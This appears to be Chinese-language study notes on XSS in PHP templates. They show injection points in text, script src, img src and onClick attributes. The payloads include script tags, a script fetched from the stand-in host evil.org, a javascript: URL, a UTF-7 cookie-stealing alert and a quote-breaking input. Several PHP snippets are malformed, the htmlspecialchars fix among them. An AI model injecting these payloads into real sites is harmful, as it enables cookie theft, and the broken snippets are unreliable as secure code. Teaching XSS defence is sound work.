<b> 歡迎：<?= $welcome_msg?></b>
攻擊XSS輸入
<script>evil_script()</script>
將動態內容替換
將$welcome_msg 替換為惡意 XSS 輸入:
<b>歡迎：<script>evil_script()</script></b>

<b>歡迎：<?= htmlspecialchars($welcome_msg,, ENT_NOQUOTES)?></b>

<script src=<?= "$script_url>">
攻擊XSS輸入
http://evil.org/evil.js
將動態內容替換
將$script_url替換為惡意 XSS 輸入:
<script src="http://evil.org/evil.js">

<img src=”<?= $img_url>”>
攻擊XSS輸入
javascript:evil_script()
將動態內容替換
將$img_url替換為惡意XSS輸入:
<img src=” javascript:evil_script()”>

+ADw-script+AD4-alert(document.cookie)+ADw-/script+AD4-

<meta http-equiv=content-type content="text/html; charset=UTF-8">

<input type="button" value="go to" onClick='goto_url("<?= $target_url>");'>
攻擊XSS輸入
foo");evil_script("
將動態內容替換
HTML 解析器會先于 JavaScript 解析器解析網頁，將$target_url 替換為惡意 XSS 輸入:
<input type="button" value="go to" onClick='goto_url("foo");evil_script("");'>
動態內容位于 JavaScript 代碼段中